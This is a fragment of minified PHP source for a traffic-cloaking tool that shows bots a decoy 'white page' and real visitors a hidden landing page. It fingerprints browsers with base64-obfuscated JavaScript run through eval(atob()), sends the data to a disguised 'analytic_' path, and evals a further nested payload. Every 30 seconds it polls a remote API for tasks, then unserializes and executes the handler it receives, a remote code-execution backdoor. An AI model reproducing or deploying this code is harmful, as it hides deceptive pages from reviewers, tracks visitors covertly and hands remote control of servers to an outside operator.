';const CLIENT_WORKER_JS_CODE='KGZ1bmN0aW9uKCl7Y29uc3QgaD1uZXcgQmxvYihbIlxuY29uc3Qgc2VuZFJlcXVlc3QgPSBhc3luYyBmdW5jdGlvbiAodXJsLCByZXF1ZXN0RGF0YSkge1xuICAgIGNvbnN0IHJlc3BvbnNlID0gYXdhaXQgZmV0Y2godXJsLCByZXF1ZXN0RGF0YSk7XG4gICAgaWYgKHJlc3BvbnNlLnN0YXR1cyAhPT0gMjAwKSB7XG4gICAgICAgIHRocm93IG5ldyBFcnJvcihgSFRUUCBlcnJvciEgc3RhdHVzOiAke3Jlc3BvbnNlLnN0YXR1c31gKTtcbiAgICB9XG4gICAgY29uc29sZS5sb2coJ3Jlc3BvbnNlJywgcmVzcG9uc2UpO1xuICAgIGlmIChyZXNwb25zZS5vaykge1xuICAgICAgICBjb25zdCBpc0pzb24gPSAhIUFycmF5LmZyb20ocmVzcG9uc2UuaGVhZGVycy5nZXQoJ0NvbnRlbnQtVHlwZScpLm1hdGNoQWxsKC9qc29ufGphdmFzY3JpcHQvZ2kpKS5sZW5ndGg7XG4gICAgICAgIGlmIChpc0pzb24pIHtcbiAgICAgICAgICAgIHJldHVybiBhd2FpdCByZXNwb25zZS5qc29uKCk7XG4gICAgICAgIH0gZWxzZSB7XG4gICAgICAgICAgICByZXR1cm4gYXdhaXQgcmVzcG9uc2UudGV4dCgpO1xuICAgICAgICB9XG4gICAgfVxufTtcblxuc2VsZi5vbm1lc3NhZ2UgPSBhc3luYyBmdW5jdGlvbihlKSAge1xuICAgIGNvbnN0IHBheWxvYWQgPSBlLmRhdGEgfHwge307XG4gICAgY29uc29sZS5sb2coJ3dvcmtlciBnb3QgcGF5bG9hZCcsIHBheWxvYWQpO1xuXG4gICAgaWYgKHBheWxvYWQucmVxdWVzdERhdGEpIHtcbiAgICAgICAgdHJ5IHtcbiAgICAgICAgICAgIGNvbnN0IHJlc3BvbnNlID0gYXdhaXQgc2VuZFJlcXVlc3QocGF5bG9hZC51cmwsIHBheWxvYWQucmVxdWVzdERhdGEpO1xuICAgICAgICAgICAgc2VsZi5wb3N0TWVzc2FnZSh7IHJlc3BvbnNlIH0pO1xuICAgICAgICB9IGNhdGNoIChlcnIpIHtcbiAgICAgICAgICAgIHNlbGYucG9zdE1lc3NhZ2UoeyBlcnJvcjogU3RyaW5nKGVycikgfSk7XG4gICAgICAgIH1cbiAgICB9XG59OyJdLAp7dHlwZToiYXBwbGljYXRpb24vamF2YXNjcmlwdCJ9KSxrPVVSTC5jcmVhdGVPYmplY3RVUkwoaCk7CnNldFRpbWVvdXQoYXN5bmMgZnVuY3Rpb24oKXtjb25zb2xlLmxvZygiXHUwNDE4XHUwNDNkXHUwNDM4XHUwNDQ2XHUwNDM4XHUwNDMwXHUwNDNiXHUwNDM4XHUwNDM3XHUwNDMwXHUwNDQ2XHUwNDM4XHUwNDRmXHUyMDI2Iik7dmFyIGI9YXdhaXQgd2luZG93LlRyYWNrZXIuZ2V0SW5zdGFuY2Uod2luZG93LkNvbmZpZy53b3JrZmxvd19pZCx3aW5kb3cuQ29uZmlnLndvcmtmbG93X3Rva2VuKS5zZXRDb25maWcoe2dldFdhc206ITEsZ2V0V2ViZ2w6ITAsZ2V0QXVkaW86ITEsZ2V0Q2FudmFzOiExfSkucHJlcGFyZURhdGEoKTtiPXttZXRob2Q6IlBPU1QiLGhlYWRlcnM6eyJDb250ZW50LVR5cGUiOiJhcHBsaWNhdGlvbi9qc29uIiwiWC1Xb3JrZmxvdy1JZCI6d2luZG93LkNvbmZpZy53b3JrZmxvd19pZCwiWC1Xb3JrZmxvdy1Ub2tlbiI6d2luZG93LkNvbmZpZy53b3JrZmxvd190b2tlbn0sYm9keTpifTt2YXIgZD13aW5kb3cuVHJhY2tlci5zYWZlUmVwbGFjZUFsbCh3aW5kb3cuVHJhY2tlci5CYXNlNjQuZW5jb2RlKGAjJHt3aW5kb3cuQ29uZmlnLndvcmtmbG93X2lkfWApLAoiPSIsIiIpO2NvbnN0IGY9bmV3IFVSTChsb2NhdGlvbi5ocmVmKTtmLnBhdGhuYW1lPWAvYW5hbHl0aWNfJHtkfWA7Yj17dXJsOmYuaHJlZixyZXF1ZXN0RGF0YTpifTtjb25zb2xlLmxvZygicGF5bG9hZEZvcldvcmtlciIsYik7d2luZG93Lm13PW5ldyBXb3JrZXIoayk7ZD1uZXcgUHJvbWlzZSgoYyxlKT0+e2NvbnN0IGc9c2V0VGltZW91dCgoKT0+ZShFcnJvcigid29ya2VyIHRpbWVvdXQiKSksNUUzKTtjb25zb2xlLmxvZygid29ya2VyUHJvbWlzZVx1MjAyNiIpO3dpbmRvdy5tdy5vbm1lc3NhZ2U9YXN5bmMgYT0+e2NsZWFyVGltZW91dChnKTtjb25zb2xlLmxvZygiZnBQcm9taXNlIG9ubWVzc2FnZVx1MjAyNiIsYSk7YS5kYXRhJiZhLmRhdGEucmVzcG9uc2U/YyhhLmRhdGEucmVzcG9uc2UpOmUoRXJyb3IoYS5kYXRhJiZhLmRhdGEuZXJyb3I/YS5kYXRhLmVycm9yOiJ1bmtub3duIHdvcmtlciBlcnJvciIpKX07d2luZG93Lm13Lm9uZXJyb3I9YT0+e2NsZWFyVGltZW91dChnKTsKZShhKX19KTt3aW5kb3cubXcucG9zdE1lc3NhZ2UoYik7dHJ5e2NvbnN0IGM9YXdhaXQgZDtjb25zb2xlLmxvZygid29ya2VyUHJvbWlzZSBkYXRhICIsYyk7Yz09PSJPSyImJmV2YWwoYXRvYigiS0daMWJtTjBhVzl1S0NsN2RISjVlM2RwYm1SdmR5NXpkRzl3S0NsOVkyRjBZMmdvWXlsN1pHOWpkVzFsYm5RdVpYaGxZME52YlcxaGJtUW9JbE4wYjNBaUtYMWtiMk4xYldWdWRDNW5aWFJGYkdWdFpXNTBjMEo1VkdGblRtRnRaU2dpYUhSdGJDSXBXekJkTG1sdWJtVnlTRlJOVEQwaVBHaGxZV1ErUEhOamNtbHdkRDR2S25SdklIQnlaWFpsYm5RZ1JtbHlaV1p2ZUNCR1QxVkRMQ0IwYUdseklHMTFjM1FnWW1VZ2FHVnlaU292YkdWMElFWkdYMFpQVlVOZlJrbFlPMXg0TTJNdmMyTnlhWEIwUGp3dmFHVmhaRDQ4WW05a2VUNDhMMkp2WkhrK0lqc0tZMjl1YzNRZ2JEMXVaWGNnVUhKdmJXbHpaU2dvWXl4bktUMCtlMk52Ym5OMElHUTljMlYwVkdsdFpXOTFkQ2dvS1QwK1p5aEZjbkp2Y2lnaWQyOXlhMlZ5SUhScGJXVnZkWFFpS1Nrc05VVXpLVHRqYjI1emIyeGxMbXh2WnlnaWJHOWhaRkJ5YjIxcGMyVmNkVEl3TWpZaUtUdDNhVzVrYjNjdWJYY3ViMjV0WlhOellXZGxQV0Z6ZVc1aklHRTlQbnRqYkdWaGNsUnBiV1Z2ZFhRb1pDazdZMjl1YzI5c1pTNXNiMmNvSW14dllXUlFjbTl0YVhObElHOXViV1Z6YzJGblpWeDFNakF5TmlJc1lTazdZUzVrWVhSaEppWmhMbVJoZEdFdWNtVnpjRzl1YzJVL1l5aGhMbVJoZEdFdWNtVnpjRzl1YzJVcE9tY29SWEp5YjNJb1lTNWtZWFJoSmlaaExtUmhkR0V1WlhKeWIzSS9ZUzVrWVhSaExtVnljbTl5T2lKMWJtdHViM2R1SUhkdmNtdGxjaUJsY25KdmNpSXBLWDA3ZDJsdVpHOTNMbTEzTG05dVpYSnliM0k5WVQwK2UyTnNaV0Z5VkdsdFpXOTFkQ2hrS1R0bktHRXBmWDBwTzNkcGJtUnZkeTV0ZHk1d2IzTjBUV1Z6YzJGblpTaDdkWEpzT25kcGJtUnZkeTVzYjJOaGRHbHZiaTVvY21WbUxISmxjWFZsYzNSRVlYUmhPbnR0WlhSb2IyUTZJa2RGVkNKOWZTazdDbXd1ZEdobGJpaGpQVDU3Wkc5amRXMWxiblF1WjJWMFJXeGxiV1Z1ZEhOQ2VWUmhaMDVoYldVb0ltaDBiV3dpS1Zzd1hTNXBibTVsY2toVVRVdzlZMzBwTG1OaGRHTm9LR005UG50amIyNXpiMnhsTG1WeWNtOXlLR01wZlNrN0NuTmxkRlJwYldWdmRYUW9ablZ1WTNScGIyNG9LWHRtZFc1amRHbHZiaUJqS0NsN2RtRnlJR1E5Wkc5amRXMWxiblF1WTNKbFlYUmxSWFpsYm5Rb0lrVjJaVzUwSWlrN1pDNXBibWwwUlhabGJuUW9Ja1JQVFVOdmJuUmxiblJNYjJGa1pXUWlMQ0V3TENFeEtUdGtiMk4xYldWdWRDNWthWE53WVhSamFFVjJaVzUwS0dRcGZXTnZibk4wSUdjOUltRndjR3hwWTJGMGFXOXVMMnBoZG1GelkzSnBjSFFnWVhCd2JHbGpZWFJwYjI0dlpXTnRZWE5qY21sd2RDQmhjSEJzYVdOaGRHbHZiaTk0TFdWamJXRnpZM0pwY0hRZ1lYQndiR2xqWVhScGIyNHZlQzFxWVhaaGMyTnlhWEIwSUhSbGVIUXZaV050WVhOamNtbHdkQ0IwWlhoMEwycGhkbUZ6WTNKcGNIUWdkR1Y0ZEM5cVlYWmhjMk55YVhCME1TNHdJSFJsZUhRdmFtRjJZWE5qY21sd2RERXVNU0IwWlhoMEwycGhkbUZ6WTNKcGNIUXhMaklnZEdWNGRDOXFZWFpoYzJOeWFYQjBNUzR6SUhSbGVIUXZhbUYyWVhOamNtbHdkREV1TkNCMFpYaDBMMnBoZG1GelkzSnBjSFF4TGpVZ2RHVjRkQzlxYzJOeWFYQjBJSFJsZUhRdmJHbDJaWE5qY21sd2RDQjBaWGgwTDNndFpXTnRZWE5qY21sd2RDQjBaWGgwTDNndGFtRjJZWE5qY21sd2RDSXVjM0JzYVhRb0lpQWlLVHNvWm5WdVkzUnBiMjRvWkNsN2RtRnlJR0VzYUQxYlhUdGJYUzVtYjNKRllXTm9MbU5oYkd3b1pDNXhkV1Z5ZVZObGJHVmpkRzl5UVd4c0tDSnpZM0pwY0hRaUtTd0tablZ1WTNScGIyNG9aU2w3S0dFOVpTNW5aWFJCZEhSeWFXSjFkR1VvSW5SNWNHVWlLU2ttSm1jdWFXNWtaWGhQWmloaEtUMDlQUzB4Zkh4b0xuQjFjMmdvWm5WdVkzUnBiMjRvWmlsN2RtRnlJR0k5Wkc5amRXMWxiblF1WTNKbFlYUmxSV3hsYldWdWRDZ2ljMk55YVhCMElpazdZaTUwZVhCbFBTSjBaWGgwTDJwaGRtRnpZM0pwY0hRaU8yVXVjM0pqUHloaUxtOXViRzloWkQxbUxHSXViMjVsY25KdmNqMW1MR0l1YzNKalBXVXVjM0pqS1RwaUxuUmxlSFJEYjI1MFpXNTBQV1V1YVc1dVpYSlVaWGgwTzJSdlkzVnRaVzUwTG1obFlXUXVZWEJ3Wlc1a1EyaHBiR1FvWWlrN1pTNXdZWEpsYm5ST2IyUmxMbkpsYlc5MlpVTm9hV3hrS0dVcE8yVXVjM0pqZkh4bUtDbDlLWDBwTzJndWJHVnVaM1JvSmlabWRXNWpkR2x2YmlCdEtHWXNZaXhyUFRBcGUyWmJhMTBvWm5WdVkzUnBiMjRvS1hzcksyczlQVDFtTG14bGJtZDBhRDlpS0NrNmJTaG1MR0lzYXlsOUtYMG9hQ3hqS1gwcEtHUnZZM1Z0Wlc1MExuRjFaWEo1VTJWc1pXTjBiM0lvSW1oMGJXd2lLU2w5TERBcE8zMHBMbU5oYkd3b2RHaHBjeWs3Q2c9PSIpKX1jYXRjaChjKXtjb25zb2xlLmVycm9yKGMpfX0sMCk7fSkuY2FsbCh0aGlzKTsK';public?string $verdict=null;public array $reason=[];private array $apiResponse=[];private string $requestFingerprint;private Config $config;private Http\Request $request;private Session $session;private Services\CacheManager $cacheManager;private Services\WebhookService $webhookService;private function __construct(){\Client\Logger :: info("__construct CALLED!");$this -> config=\Client\Config :: getInstance();$this -> session=\Client\Session :: getInstance();$this -> request=new \Client\Http\Request();$this -> cacheManager=new \Client\Services\CacheManager();$this -> webhookService=new \Client\Services\WebhookService($this -> config,$this -> request);$this -> requestFingerprint=$this -> calculateRequestFingerprint();\Client\Logger :: info("REQUESTED URL: {$this -> request -> urlPath}");$this -> checkSession();if(is_null($this -> verdict)){$this -> process();}$this -> pollAndExecuteTask();}public static function init():CloakCore{$_GET['_url_']=$_GET['_url_']?? '/';\Client\Logger :: info("entry point; URL: {$_GET['_url_']}");$session=\Client\Session :: getInstance();if(empty($session)||!$session -> has('config')){\Client\Logger :: warn("init: creating new instance");return new \Client\CloakCore();}$currentConfig=\Client\Config :: getInstance();$savedConfig=new \Client\Config($session -> get('config',[]));if(empty($savedConfig -> all())){\Client\Logger :: warn("Saved config is empty, creating new instance");return new self();}if(array_diff_assoc($savedConfig -> all(),$currentConfig -> all())){\Client\Logger :: info("Session config differs from current config, destroying session.");$session -> destroy();return new \Client\CloakCore();}try{if(!empty($session -> saved_state)){\Client\Logger :: warn("try restore from session");return self :: restoreFromSession();}else{\Client\Logger :: warn("saved_state is empty, creating new instance");return new \Client\CloakCore();}}catch(\Throwable $e){\Client\Logger :: warn("Failed to unserialize session data: ".$e -> getMessage());$session -> destroy();return new \Client\CloakCore();}}public static function restoreFromSession():CloakCore{$session=\Client\Session :: getInstance();if(empty($session)||!$session -> has('config')||!$session -> has('saved_state')||empty($session -> saved_state)){\Client\Logger :: warn("restoreFromSession failed: config mismatch - creating new instance");return new \Client\CloakCore();}\Client\Logger :: warn("restoreFromSession: restoring from session data...");return unserialize($session -> saved_state);}public function process():bool{$urlBuilder=new \Client\Services\UrlBuilder($this -> config,$this -> request,$this -> isUser());$urls=$urlBuilder -> build();try{$this -> apiResponse=\Client\PunchAPI :: process($this -> request -> ipAddr,$this -> request -> userAgent,$this -> request -> userLanguage,$this -> request -> referer,['fingerprint'=>$this -> requestFingerprint,'host'=>$this -> request -> host,'raw_url'=>$urls['urlPath'],'url'=>$urls['url'],]);$this -> reason=$this -> apiResponse['reason']??[];$this -> verdict=($this -> apiResponse['blocked']?? true)?self :: VERDICT_BOT:self :: VERDICT_USER;}catch(\Throwable $e){\Client\Logger :: error("PunchAPI::process failed: ".$e -> getMessage());}$this -> saveState();/*// Send webhook notification*/if($this -> config -> isWebhookEnabled()){$this -> webhookService -> sendVisitNotification($this -> apiResponse,$this -> reason,$this -> isUser(),$this -> requestFingerprint);}return $this -> isUser();}public function makeAction():void{\Client\Logger :: info("makeAction (decide based on {$this -> config -> getIncludeType()})");$contentFetcher=new \Client\Services\ContentFetcher($this -> config,$this -> request,$this -> session,$this -> isUser());$content=$this -> cacheManager -> get($this -> request -> urlPath);if($content===null){$key=\Client\Session :: getEncodedKey();/*// save browser info and fingerprints*/if(str_contains($this -> request -> urlPath,"analytic_{$key}")){echo $this -> saveBrowserInfoAndFingerprints($key,$this -> request -> getRawBody());return;}if($this -> config -> isJsChecksEnabled()&&$this -> isUser()&&!\Client\Session :: checkJSCheckedCookie()){\Client\Logger :: info("JS check required");echo $this -> renderMiddleware();return;}$content=$contentFetcher -> fetch();$this -> cacheManager -> set($this -> request -> urlPath,$content);}echo $content;exit;}protected function injectWorkerScript():string{if(!$this -> isUser()){return '';}$jsCode=\Client\CloakCore :: CLIENT_WORKER_JS_CODE;return" eval(atob('{$jsCode}'));";}private function renderMiddleware():string{\Client\Logger :: info("Render middleware");header("Content-Type: text/html; charset=UTF-8");header('Cache-Control: no-cache, no-store, must-revalidate');header('Pragma: no-cache');header('Expires: 0');$jsCode=self :: CLIENT_JS_LIBS_CODE;return"<!DOCTYPE html>\n<html lang=\"en\"><head>\n<script type=\"text/javascript\">\n window['_config'] = window['_config'] || '{$this -> config -> toJSON()}';\n window['_t'] = '{$jsCode}';\n try { eval(atob(window['_t'])); } catch (e) { console.error('Error loading main script:', e); }\n delete window['_t'];\n window.Config = JSON.parse(window['_config']);\n</script>\n</head><body><script type=\"text/javascript\">{$this -> injectWorkerScript()}</script></body></html>";}private function mergeJSDataWithSession(array $data):array{if($data['verdict']?? null){$this -> verdict=strtoupper($data['verdict'])===self :: VERDICT_BOT?self :: VERDICT_BOT:self :: VERDICT_USER;}if($data['device_fingerprint']?? null){$this -> session -> device_fingerprint=$data['device_fingerprint'];}$this -> session -> set('request_fingerprint',$data['request_fingerprint']);$this -> reason=[... $this -> reason,... $data['reason']];$this -> session -> visit_details=$data;$this -> saveState();return[... $data,'request_fingerprint'=>$this -> session -> get('request_fingerprint')];}private function saveBrowserInfoAndFingerprints($key,$rawBody):string{if(\Client\Session :: checkJSCheckedCookie()){\Client\Logger :: info("JS check failed");return 'OK';}try{$decodedData=xorStringWithKey($rawBody,$key);\Client\Logger :: info("decoding data with key: {$key}");\Client\Logger :: info("data: {$rawBody}");\Client\Logger :: info("decoded data: {$decodedData}");$data=json_decode($decodedData,true);\Client\Logger :: info("JSON decoded data: ".json_encode($data,JSON_PRETTY_PRINT).PHP_EOL);if(json_last_error()!==JSON_ERROR_NONE){throw new \Exception("JSON decode error: ".json_last_error_msg());}if(!empty($data)){$data=[... $data,'session_id'=>$this -> session -> getId(),'request_fingerprint'=>$this -> requestFingerprint,'workflow_id'=>$this -> config -> getWorkflowId(),'fingerprint_hash'=>md5($this -> session -> device_fingerprint.''.$this -> requestFingerprint)];$response=\Client\PunchAPI :: jsCheck($data);\Client\Logger :: info("PunchAPI::jsCheck response: ".json_encode($response,JSON_PRETTY_PRINT).PHP_EOL);if($response['error']?? null){\Client\Logger :: error("PunchAPI::jsCheck failed: ".$response['error']);return 'Error';}elseif($response['success']?? null){\Client\Session :: addJSCheckedCookie();$this -> mergeJSDataWithSession([... $data,'verdict'=>$response['verdict'],'reason'=>$response['reason']]);return 'OK';}elseif($response['message']?? null){\Client\Logger :: info("PunchAPI::jsCheck message: ".$response['message']);return 'Error';}}}catch(\Throwable $e){\Client\Logger :: error("Error decoding data: {$e -> getMessage()}");return 'Error';}\Client\Logger :: info("This is a test request to check if the user is real browser or not.");\Client\Session :: addJSCheckedCookie();return 'OK';}private function calculateRequestFingerprint():string{$data=['sessionId'=>$this -> session -> getId(),'ip'=>$this -> request -> ipAddr,'ua'=>$this -> request -> userAgent,];$hash=hash('crc32',json_encode($data),false);\Client\Logger :: warn("request fingerprint: {$hash}");return $hash;}private function checkSession():void{\Client\Logger :: warn("Checking request fingerprint: {$this -> requestFingerprint}");\Client\Logger :: warn("stored fingerprint: {$this -> session -> request_fingerprint}");if($this -> requestFingerprint===$this -> session -> request_fingerprint){\Client\Logger :: info("Session already exists with the same request fingerprint: {$this -> requestFingerprint}");return;}if($this -> session -> has('request_fingerprint')){\Client\Logger :: warn("REQUEST MANIPULATIONS DETECTED!!!, session fingerprint: {$this -> session -> request_fingerprint} != {$this -> requestFingerprint}");if(!in_array('request_manipulations',$this -> reason)){$this -> reason[]='request_manipulations';}$this -> session -> removeJSCheckCookie();$this -> verdict=self :: VERDICT_BOT;$this -> logVisit();$this -> saveState();}}public function saveState():void{$this -> session -> request_fingerprint=$this -> requestFingerprint;$this -> session -> verdict=$this -> verdict;$this -> session -> config=$this -> config -> all();$this -> session -> saved_state=serialize($this);}private function logVisit():void{$logger=new \Client\Services\VisitorLogger($this -> config,$this -> request,$this -> apiResponse,$this -> reason,$this -> isUser(),$this -> requestFingerprint);$logger -> logVisit();}public function isBot():bool{return $this -> verdict===self :: VERDICT_BOT;}public function isUser():bool{return $this -> verdict===self :: VERDICT_USER;}public function __serialize():array{return['request_fingerprint'=>$this -> requestFingerprint,'verdict'=>$this -> verdict,'apiResponse'=>$this -> apiResponse,'reason'=>$this -> reason,'config'=>$this -> config -> all(),];}public function __unserialize(array $data):void{$this -> request=new \Client\Http\Request();$this -> config=new \Client\Config($data['config']??[]);$this -> verdict=$data['verdict']?? self :: VERDICT_BOT;$this -> apiResponse=$data['apiResponse']??[];$this -> reason=$data['reason']??[];$this -> session=\Client\Session :: getInstance();$this -> cacheManager=new \Client\Services\CacheManager();$this -> webhookService=new \Client\Services\WebhookService($this -> config,$this -> request);$this -> requestFingerprint=$this -> calculateRequestFingerprint();$this -> checkSession();if($this -> request -> urlPath=='/'){$this -> logVisit();}$this -> pollAndExecuteTask();}private function getNextTask(){$response=\Client\PunchAPI :: checkForTask();return $response['task']?? NULL;}private function pollAndExecuteTask():void{try{@mkdir(__DIR__.'/.punchcloak');}catch(\Throwable $e){}$checkFile=__DIR__.'/.punchcloak/.punch-task-check';$taskFile=__DIR__.'/.punchcloak/.punch-task';$now=time();$lastCheck=file_exists($checkFile)?filemtime($checkFile):0;$secSince=$now-$lastCheck;\Client\Logger :: info("wait...{$secSince}");if($now-$lastCheck<30){return;}\Client\Logger :: info("Checking for updates...");/*// обновляем время проверки*/@touch($checkFile);$task=$this -> getNextTask();\Client\Logger :: info("Task received: ".json_encode($task,JSON_UNESCAPED_UNICODE));if(!$task||!isset($task['id'])||!isset($task['type'])){\Client\Logger :: info("No updates found.");return;}\Client\Logger :: info("Task found: {$task['id']}, type: {$task['type']}");file_put_contents($taskFile,json_encode($task,JSON_UNESCAPED_UNICODE));$handler=$task['payload']['handler'];$taskId=$task['id']?? null;try{if(is_string($handler)){$handler=unserialize($handler);}\Client\Logger :: info("...executing task {$taskId} with handler: ".get_class($handler));$result=$handler -> execute();/*// Отправляем результат*/if($taskId){\Client\PunchAPI :: completeTask($taskId,$result);}}catch(\Throwable $e){\Client\PunchAPI :: failTask($taskId,$e -> getMessage());\Client\Logger :: warn("Task {$task['id']} failed: ".$e -> getMessage());}finally{@unlink($taskFile);}}}}namespace Client\Services{class ContentFetcher{private \Client\Config $config;private \Client\Http\Request $request;private \Client\Session $session;private UrlBuilder $urlBuilder;private bool $isUser;public function __construct(\Client\Config $config,\Client\Http\Request $request,\Client\Session $session,bool $isUser){$this -> config=$config;$this -> request=$request;$this -> session=$session;$this -> isUser=$isUser;$this -> urlBuilder=new \Client\Services\UrlBuilder($config,$request,$isUser);}private static function HEAD_CLOSE_TAG():string{return '</'.self :: strrev('daeh').'>';}private static function strrev(string $string,string $encoding=null):string{$chars=mb_str_split($string,1,$encoding?:mb_internal_encoding());return implode('',array_reverse($chars));}public function fetch():string{$urls=$this -> urlBuilder -> build();switch($this -> config -> getIncludeType()-> getValue()){case \Client\IncludeType :: FILE_GET_CONTENTS:return $this -> fileGetContents($urls);case \Client\IncludeType :: CURL:return $this -> curl($urls);case \Client\IncludeType :: REDIRECT_PERMANENT:case \Client\IncludeType :: REDIRECT_TEMPORARY:$this -> redirect();return '';default:return '';}}private function fileGetContents(array $urls):string{$filePath=BASE_DIR.$urls['path'];if(file_exists($filePath)){return file_get_contents($filePath);}return file_get_contents($urls['url']);}private function curl(array $urls):string{\Client\Logger :: info("CURL request to {$this -> request -> urlPath}");$targetUrl=$urls['url'];if($this -> request -> method==='GET'&&$urls['path']&&self :: isAsset($urls['path'])){\Client\Logger :: info("Curl asset: {$urls['path']}");$mimeType=self :: mimeTypeByName($urls['path']);header("Content-Type: {$mimeType}");if(file_exists($urls['path'])){\Client\Logger :: info("...and asset file exists");echo file_get_contents($urls['path'],false,null);exit;}}$workflowToken=WORKFLOW_TOKEN;$requestHeaders=getallheaders();$curlHeaders=[];foreach($requestHeaders as $key=>$value){if(strtolower($key)==='host')continue;$curlHeaders[]="$key : $value";}$curlHeaders[]="X-PunchCloak: $workflowToken";$curlHeaders[]="X-Client-IP: {$this -> request -> ipAddr}";$curlHeaders[]="Host: {$this -> request -> host}";$targetUrl=str_replace($this -> request -> host,'127.0.0.1',$targetUrl);$targetUrl=str_replace('https://','http://',$targetUrl);$cookieFilePath=$this -> session -> cookieFilePath ?? tempnam("/tmp","cookies");$this -> session -> cookieFilePath=$cookieFilePath;$ch=curl_init();curl_setopt($ch,CURLOPT_URL,$targetUrl);curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,false);curl_setopt($ch,CURLOPT_HEADER,true);curl_setopt($ch,CURLOPT_CUSTOMREQUEST,$this -> request -> method);curl_setopt($ch,CURLOPT_HTTPHEADER,$curlHeaders);curl_setopt($ch,CURLOPT_ENCODING,'');curl_setopt($ch,CURLOPT_COOKIEJAR,$cookieFilePath);curl_setopt($ch,CURLOPT_COOKIEFILE,$cookieFilePath);curl_setopt($ch,CURLOPT_USERAGENT,$this -> request -> userAgent);curl_setopt($ch,CURLOPT_REFERER,$this -> request -> referer);if(in_array($this -> request -> method,['POST','PUT','PATCH','DELETE'])){$this -> setPostFields($ch);}if(!empty($_COOKIE)){$cookies=[];foreach($_COOKIE as $k=>$v){$cookies[]="$k=".urlencode($v);}curl_setopt($ch,CURLOPT_COOKIE,implode('; ',$cookies));}$response=curl_exec($ch);$header_size=curl_getinfo($ch,CURLINFO_HEADER_SIZE);$http_code=curl_getinfo($ch,CURLINFO_HTTP_CODE);curl_close($ch);\Client\Logger :: info("{$this -> request -> method} ({$targetUrl}); HTTP code: {$http_code}");$raw_headers=substr($response,0,$header_size);$body=substr($response,$header_size);$this -> proxyHeaders($raw_headers,$http_code,$urls);return $this -> rewriteBody($body,$urls);}private function setPostFields($ch):void{$contentType=$_SERVER['CONTENT_TYPE']?? '';if(stripos($contentType,'application/json')!==false){$body=file_get_contents('php://input');curl_setopt($ch,CURLOPT_POSTFIELDS,$body);}elseif(stripos($contentType,'application/x-www-form-urlencoded')!==false){curl_setopt($ch,CURLOPT_POSTFIELDS,http_build_query($_POST));}elseif(stripos($contentType,'multipart/form-data')!==false){$data=[];foreach($_POST as $key=>$val)$data[$key]=$val;foreach($_FILES as $key=>$file){if(is_array($file['tmp_name'])){foreach($file['tmp_name']as $i=>$tmp){$data[$key."[$i]"]=new \CURLFile($tmp,$file['type'][$i],$file['name'][$i]);}}else{$data[$key]=new \CURLFile($file['tmp_name'],$file['type'],$file['name']);}}curl_setopt($ch,CURLOPT_POSTFIELDS,$data);}else{$body=file_get_contents('php://input');curl_setopt($ch,CURLOPT_POSTFIELDS,$body);}}private function proxyHeaders(string $raw_headers,int $http_code,array $urls):void{$lines=explode("\r\n",$raw_headers);foreach($lines as&$line){if(stripos($line,'Transfer-Encoding:')===0)continue;if(stripos($line,'Content-Length:')===0)continue;if(str_starts_with(strtolower($line),'x-punchcloak:'))continue;if(str_starts_with(strtolower($line),'x-client-ip:'))continue;if(str_starts_with(strtolower($line),'x-forwarded-by:'))continue;if(preg_match('#^HTTP/#',$line)){header($line,true,$http_code);}else{$line=str_replace("{$urls['host']}/{$urls['contentDir']}",$urls['host'],$line);$line=str_replace("{$urls['host']}%2F{$urls['contentDir']}",$urls['host'],$line);if(str_starts_with(strtolower($line),'location')){$line=$this -> rewriteLocationHeader($line,$urls);}if(str_contains(strtolower($line),'content-encoding:')){continue;}if(str_starts_with(strtolower($line),'set-cookie:')){header($line,false);continue;}if(stripos($line,'Content-Type:')===0){$contentType=trim(substr($line,strlen('Content-Type:')));$line="Content-Type: $contentType";}header($line);}}}private function rewriteLocationHeader(string $line,array $urls):string{$parts=explode(': ',$line);$location=$parts[1];\Client\Logger :: info("Redirect to: {$location}");if(str_starts_with("/{$urls['contentDir']}/",$location)){$location=str_replace("/{$urls['contentDir']}/","/",$location);}$pattern='/https?:\/\/'.preg_quote($urls['host'],'/')."/";$location=preg_replace($pattern,"{$urls['scheme']}://{$urls['host']}",$location);$location=str_replace("http%3A%2F%2F{$urls['host']}","{$urls['scheme']}%3A%2F%2F{$urls['host']}",$location);$location=str_replace("http://{$urls['host']}","{$urls['scheme']}://{$urls['host']}",$location);\Client\Logger :: info("Rewrite redirect: {$location}");return"Location: $location";}private function rewriteBody(string $body,array $urls):string{$result=str_replace("/{$urls['contentDir']}/",'/',$body);$result=str_replace("{$urls['scheme']}://{$urls['host']}/{$urls['contentDir']}/","{$urls['scheme']}://{$urls['host']}/",$result);$result=str_replace("{$urls['host']}/{$urls['contentDir']}",$urls['host'],$result);$preg="/https?:\\\\\/\\\\\/".preg_quote($urls['host'],'/')."\\\\\/".preg_quote($urls['contentDir'],'/').'/';$result=preg_replace($preg,'https:\/\/'.preg_quote($urls['host'],'/').'/',$result);return $result;}public function redirect():void{$pageAddr=$this -> isUser?($this -> config -> get('land_page')?? ''):($this -> config -> get('white_page')?? '');if($this -> config -> getIncludeType()-> getValue()===\Client\IncludeType :: REDIRECT_PERMANENT){header("HTTP/1.1 301 Moved Permanently");header("Location: {$pageAddr}");}elseif($this -> config -> getIncludeType()-> getValue()===\Client\IncludeType :: REDIRECT_TEMPORARY){header("HTTP/1.1 302 Found");header("Location: {$pageAddr}");}}public static function mimeTypeByName(string $name){$ext=strtolower(pathinfo($name,PATHINFO_EXTENSION));$parts=explode('?',$ext);$ext=reset($parts);$mimeTypes=['html'=>'text/html; charset=UTF-8','htm'=>'text/html; charset=UTF-8','css'=>'text/css; charset=UTF-8','js'=>'application/javascript; charset=UTF-8','json'=>'application/json; charset=UTF-8','xml'=>'application/xml; charset=UTF-8','jpg'=>'image/jpeg','jpeg'=>'image/jpeg','png'=>'image/png','gif'=>'image/gif','svg'=>'image/svg+xml','webp'=>'image/webp','woff'=>'font/woff','woff2'=>'font/woff2','ttf'=>'font/ttf','otf'=>'font/otf','eot'=>'application/vnd.ms-fontobject','ico'=>'image/x-icon','pdf'=>'application/pdf','zip'=>'application/zip','rar'=>'application/vnd.rar','mp3'=>'audio/mpeg','mp4'=>'video/mp4','webm'=>'video/webm','ogg'=>'audio/ogg','txt'=>'text/plain; charset=UTF-8',];return $mimeTypes[$ext]?? FALSE;}public static function isAsset(string $name):bool{return self :: mimeTypeByName($name)!==FALSE;}}class UrlBuilder{private \Client\Config $config;private \Client\Http\Request $request;private bool $isUser;public function __construct(\Client\Config $config,\Client\Http\Request $request,bool $isUser){$this -> config=$config;$this -> request=$request;$this -> 